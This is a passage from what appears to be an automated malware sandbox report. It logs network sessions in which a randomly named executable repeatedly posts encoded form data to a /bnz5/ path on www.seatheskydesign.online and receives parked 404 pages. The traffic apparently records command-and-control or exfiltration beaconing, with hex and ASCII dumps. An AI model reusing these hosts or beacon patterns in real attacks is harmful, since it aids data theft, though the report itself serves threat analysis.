                                                                                                      Apr 16, 2024 12:02:35.193644047 CEST107INHTTP/1.1 436
                                                                                                      date: Tue, 16 Apr 2024 10:02:35 GMT
                                                                                                      content-length: 0
                                                                                                      server: NginX
                                                                                                      connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      45192.168.2.54976466.96.162.136802940C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Apr 16, 2024 12:02:40.512943029 CEST733OUTPOST /bnz5/ HTTP/1.1
                                                                                                      Host: www.seatheskydesign.online
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 203
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.seatheskydesign.online
                                                                                                      Referer: http://www.seatheskydesign.online/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Data Raw: 67 72 3d 33 4d 41 6a 7a 44 4a 61 77 38 6c 44 48 4a 33 53 66 66 65 4c 54 31 47 7a 32 31 30 6e 2b 49 76 54 64 53 6e 34 34 56 77 47 49 70 74 42 70 42 5a 73 55 72 38 76 75 69 6c 68 36 42 68 46 31 55 64 42 37 77 78 4c 4c 35 44 4f 46 6f 51 37 67 56 4a 30 56 52 71 44 65 37 71 4c 66 54 48 55 33 6c 41 38 30 66 75 2f 51 4e 36 58 69 75 48 59 56 6e 65 52 76 6a 73 45 37 30 6f 51 6b 35 7a 4c 7a 4a 48 69 34 2b 6f 6c 44 7a 66 39 6d 72 32 56 44 69 54 64 55 4b 30 39 50 42 79 55 42 76 37 31 72 4b 4c 30 4e 75 69 55 48 4b 67 62 77 67 57 35 32 77 34 33 32 6f 77 61 39 33 43 53 35 69 65 63 6f 51 4d 49 50 48 39 4b 54 48 77 3d
                                                                                                      Data Ascii: gr=3MAjzDJaw8lDHJ3SffeLT1Gz210n+IvTdSn44VwGIptBpBZsUr8vuilh6BhF1UdB7wxLL5DOFoQ7gVJ0VRqDe7qLfTHU3lA80fu/QN6XiuHYVneRvjsE70oQk5zLzJHi4+olDzf9mr2VDiTdUK09PByUBv71rKL0NuiUHKgbwgW52w432owa93CS5iecoQMIPH9KTHw=
                                                                                                      Apr 16, 2024 12:02:40.665096998 CEST1087INHTTP/1.1 404 Not Found
                                                                                                      Date: Tue, 16 Apr 2024 10:02:40 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 867
                                                                                                      Connection: close
                                                                                                      Server: Apache
                                                                                                      Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                                                                                                      Accept-Ranges: bytes
                                                                                                      Age: 0
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      46192.168.2.54976566.96.162.136802940C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Apr 16, 2024 12:02:43.166287899 CEST753OUTPOST /bnz5/ HTTP/1.1
                                                                                                      Host: www.seatheskydesign.online
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 223
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.seatheskydesign.online
                                                                                                      Referer: http://www.seatheskydesign.online/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Data Raw: 67 72 3d 33 4d 41 6a 7a 44 4a 61 77 38 6c 44 47 70 48 53 4d 75 65 4c 55 56 47 77 7a 31 30 6e 6c 34 76 58 64 53 62 34 34 51 49 57 49 61 5a 42 6e 42 70 73 56 75 49 76 69 43 6c 68 31 68 68 45 78 55 64 38 37 77 4d 32 4c 37 58 4f 46 6f 45 37 67 58 42 30 56 6d 32 45 66 72 71 46 55 7a 48 46 71 31 41 38 30 66 75 2f 51 4d 65 75 69 75 66 59 56 33 75 52 75 43 73 48 7a 55 6f 54 73 5a 7a 4c 33 4a 48 6d 34 2b 70 32 44 33 2f 44 6d 74 71 56 44 69 6a 64 55 62 30 2b 47 42 79 53 4f 50 36 37 6e 71 75 73 45 64 43 59 41 59 4a 37 6e 67 53 59 36 6d 56 64 73 4b 34 79 75 58 75 71 70 78 57 72 35 67 74 68 56 6b 74 36 4e 51 6e 79 32 66 77 37 5a 5a 50 66 71 4b 58 41 4c 39 4b 77 66 44 42 6b
                                                                                                      Data Ascii: gr=3MAjzDJaw8lDGpHSMueLUVGwz10nl4vXdSb44QIWIaZBnBpsVuIviClh1hhExUd87wM2L7XOFoE7gXB0Vm2EfrqFUzHFq1A80fu/QMeuiufYV3uRuCsHzUoTsZzL3JHm4+p2D3/DmtqVDijdUb0+GBySOP67nqusEdCYAYJ7ngSY6mVdsK4yuXuqpxWr5gthVkt6NQny2fw7ZZPfqKXAL9KwfDBk
                                                                                                      Apr 16, 2024 12:02:43.316370964 CEST1087INHTTP/1.1 404 Not Found
                                                                                                      Date: Tue, 16 Apr 2024 10:02:43 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 867
                                                                                                      Connection: close
                                                                                                      Server: Apache
                                                                                                      Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                                                                                                      Accept-Ranges: bytes
                                                                                                      Age: 0
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      47192.168.2.54976666.96.162.136802940C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Apr 16, 2024 12:02:45.822494984 CEST1770OUTPOST /bnz5/ HTTP/1.1
                                                                                                      Host: www.seatheskydesign.online
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 1239
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.seatheskydesign.online
                                                                                                      Referer: http://www.seatheskydesign.online/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Data Raw: 67 72 3d 33 4d 41 6a 7a 44 4a 61 77 38 6c 44 47 70 48 53 4d 75 65 4c 55 56 47 77 7a 31 30 6e 6c 34 76 58 64 53 62 34 34 51 49 57 49 61 42 42 6e 77 4a 73 55 4a 6b 76 68 43 6c 68 38 42 68 42 78 55 64 74 37 77 6b 36 4c 37 4c 65 46 72 38 37 67 79 4e 30 58 58 32 45 52 72 71 46 62 54 47 43 33 6c 42 32 30 66 65 37 51 4d 4f 75 69 75 66 59 56 78 71 52 6f 54 73 48 31 55 6f 51 6b 35 7a 48 7a 4a 47 78 34 2b 78 6d 44 33 37 54 6d 2b 79 56 44 43 7a 64 53 70 73 2b 65 52 79 51 4a 50 37 6d 6e 71 53 4e 45 64 65 2b 41 59 52 64 6e 69 43 59 2b 51 4d 32 6f 70 42 73 39 33 6d 56 37 53 57 53 6e 77 6c 30 66 31 70 4e 48 51 50 36 7a 65 49 79 51 4d 6a 79 6b 5a 75 48 66 73 61 30 4a 6b 63 2f 72 4b 6d 43 36 76 31 79 78 4d 78 52 6b 49 38 69 37 58 64 75 6a 6a 61 48 6b 61 42 48 55 38 61 39 4c 4d 53 64 32 58 6f 61 49 58 4f 45 54 6f 77 37 57 51 71 33 78 6a 6c 57 48 67 7a 67 76 6f 47 36 56 39 78 2b 49 42 35 56 69 4a 30 73 55 32 63 76 79 48 32 68 79 2b 56 6a 2b 52 35 37 63 4a 49 72 5a 52 36 47 35 61 61 39 4a 75 6d 71 6b 30 54 53 46 78 58 34 41 78 73 74 6e 6e 37 33 2f 4f 6a 2b 57 6d 53 4c 72 6e 30 43 32 48 47 76 30 38 6d 53 73 67 79 48 55 5a 4a 59 47 6f 54 31 42 65 78 49 4d 49 49 66 72 2b 36 78 42 4c 52 53 77 50 54 71 63 36 61 44 6a 62 4c 32 4a 37 4d 31 41 57 36 75 48 69 35 35 70 76 44 5a 46 62 79 2b 7a 30 49 4c 57 70 6e 4e 6b 55 43 69 46 56 65 58 50 49 34 7a 4f 76 31 62 55 75 44 55 71 58 35 6f 4b 30 2b 4c 44 54 35 2f 32 36 58 68 5a 39 57 41 6e 33 52 4e 33 76 51 47 31 5a 4f 63 4c 63 75 46 54 78 49 6a 75 4a 6a 4c 58 45 56 7a 4d 34 66 4b 4a 37 61 50 62 33 6b 77 6e 73 74 7a 38 4e 6e 77 33 34 73 55 62 61 4f 43 6d 6c 33 72 4f 63 2b 39 64 44 73 7a 2f 5a 49 4a 38 54 2f 45 6c 75 70 4f 45 55 50 30 6c 6f 74 58 2f 61 7a 32 51 43 6c 37 47 73 7a 45 76 4a 31 38 34 68 37 61 78 33 6a 33 55 30 6c 79 4b 69 66 4c 55 71 46 33 46 4f 58 71 72 30 56 72 67 46 42 36 6e 36 30 4a 45 39 61 38 42 35 35 45 78 2b 71 64 43 58 49 74 6e 65 4f 48 35 54 56 2b 52 32 53 70 61 6a 43 37 42 58 62 51 44 55 53 77 37 42 6b 2f 4b 6e 72 6d 68 54 47 65 76 45 47 4b 70 78 76 4d 62 56 34 4f 51 52 38 46 33 44 45 53 56 33 4d 69 50 41 6c 34 66 6c 69 4b 67 2b 64 59 67 76 4e 73 69 48 75 33 65 5a 57 35 39 75 4e 50 4a 77 4b 37 33 53 4a 4b 32 5a 4b 73 75 51 61 66 54 67 48 67 76 52 54 36 38 52 74 68 78 33 4f 4f 4c 6c 5a 74 78 39 33 58 45 30 7a 35 51 4d 79 73 61 74 79 42 6a 6c 67 56 57 76 39 4a 39 31 52 46 78 64 54 6d 73 46 69 68 39 55 65 48 76 34 34 4c 2b 77 72 75 68 65 75 34 46 34 4f 66 38 54 30 59 43 43 4b 45 64 52 71 68 33 67 4e 78 6a 4b 56 43 56 50 62 39 5a 34 38 31 2b 79 58 2b 69 4d 38 35 4b 78 54 64 41 38 63 65 66 62 72 70 77 62 4f 30 66 57 53 5a 4e 69 46 54 44 45 5a 53 7a 59 69 7a 76 55 6a 59 6b 6b 54 6a 73 45 4d 5a 55 35 65 67 43 69 45 6c 6e 4c 67 6a 50 59 4d 44 47 71 7a 64 58 58 78 69 63 65 39 52 4f 30 59 34 2b 52 6c 49 57 37 57 63 2b 46 64 42 39 49 42 6b 37 68 6b 62 72 38 34 41 52 59 6c 63 7a 6d 55 76 45 74 69 43 39 6d 47 2f 6b 63 4b 57 57 59 79 77 70 6b 42 66 78 65 2f 34 43 41 68 56 52 2b 77 54 6a 4a 51 73 6f 78 69 70 53 61 32 7a 45 67 2f 6b 78 70 76 53 67 55 4d 51 74 38 2f 61 77 2b 54 5a 6f 30 64 73 4a 32 44 66 36 2f 6d 71 38 69 41 47 55 41 75 74 69 4f 61 4b 6a 55 70 57 35 32 61 58 62 7a 4d 63 52 64 32 6d 76 30 4d 39 32 47 4e 78 4b 79 35 39 30 73 2f 71 79 49 7a 53 71 53 47 74 6d 34 45 4d 32 43 6a 75 5a 6d 51 4e 66 61 72 69 63 61 45 6a 43 69 66 32 4b 6d 55 6d 62 50 4b 6c 53 77 4d 7a 6c 50 33 6a 77 75 39 77 36 33 4d 7a 69 46 74 4b 73 49 6b 6e 41 71 37 56 49 78 30 56 6e 42 50 48 71 71 45 54 70 63 43 54 42 71 77 36 42 4a 4f 73 34 4a 75 39 43 65 72 2b 45 2b 43 43 44 43 70 61 6f 57 75 75 76 4c 53 39 30 71 37 37 61 6c 4c 6d 4d 69 59 32 74 38 6e 75 77 4e 65 4c 47 55 56 48 72 2f 4e 65 6d 56 76 43 72 67 33 78 34 57 4a 48 46 42 51 75 4b 41 3d 3d
                                                                                                      Data Ascii: gr=3MAjzDJaw8lDGpHSMueLUVGwz10nl4vXdSb44QIWIaBBnwJsUJkvhClh8BhBxUdt7wk6L7LeFr87gyN0XX2ERrqFbTGC3lB20fe7QMOuiufYVxqRoTsH1UoQk5zHzJGx4+xmD37Tm+yVDCzdSps+eRyQJP7mnqSNEde+AYRdniCY+QM2opBs93mV7SWSnwl0f1pNHQP6zeIyQMjykZuHfsa0Jkc/rKmC6v1yxMxRkI8i7XdujjaHkaBHU8a9LMSd2XoaIXOETow7WQq3xjlWHgzgvoG6V9x+IB5ViJ0sU2cvyH2hy+Vj+R57cJIrZR6G5aa9Jumqk0TSFxX4Axstnn73/Oj+WmSLrn0C2HGv08mSsgyHUZJYGoT1BexIMIIfr+6xBLRSwPTqc6aDjbL2J7M1AW6uHi55pvDZFby+z0ILWpnNkUCiFVeXPI4zOv1bUuDUqX5oK0+LDT5/26XhZ9WAn3RN3vQG1ZOcLcuFTxIjuJjLXEVzM4fKJ7aPb3kwnstz8Nnw34sUbaOCml3rOc+9dDsz/ZIJ8T/ElupOEUP0lotX/az2QCl7GszEvJ184h7ax3j3U0lyKifLUqF3FOXqr0VrgFB6n60JE9a8B55Ex+qdCXItneOH5TV+R2SpajC7BXbQDUSw7Bk/KnrmhTGevEGKpxvMbV4OQR8F3DESV3MiPAl4fliKg+dYgvNsiHu3eZW59uNPJwK73SJK2ZKsuQafTgHgvRT68Rthx3OOLlZtx93XE0z5QMysatyBjlgVWv9J91RFxdTmsFih9UeHv44L+wruheu4F4Of8T0YCCKEdRqh3gNxjKVCVPb9Z481+yX+iM85KxTdA8cefbrpwbO0fWSZNiFTDEZSzYizvUjYkkTjsEMZU5egCiElnLgjPYMDGqzdXXxice9RO0Y4+RlIW7Wc+FdB9IBk7hkbr84ARYlczmUvEtiC9mG/kcKWWYywpkBfxe/4CAhVR+wTjJQsoxipSa2zEg/kxpvSgUMQt8/aw+TZo0dsJ2Df6/mq8iAGUAutiOaKjUpW52aXbzMcRd2mv0M92GNxKy590s/qyIzSqSGtm4EM2CjuZmQNfaricaEjCif2KmUmbPKlSwMzlP3jwu9w63MziFtKsIknAq7VIx0VnBPHqqETpcCTBqw6BJOs4Ju9Cer+E+CCDCpaoWuuvLS90q77alLmMiY2t8nuwNeLGUVHr/NemVvCrg3x4WJHFBQuKA==
                                                                                                      Apr 16, 2024 12:02:45.965756893 CEST1087INHTTP/1.1 404 Not Found
                                                                                                      Date: Tue, 16 Apr 2024 10:02:45 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 867
                                                                                                      Connection: close
                                                                                                      Server: Apache
                                                                                                      Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                                                                                                      Accept-Ranges: bytes
                                                                                                      Age: 0
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      48192.168.2.54976766.96.162.136802940C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      TimestampBytes transferredDirectionData
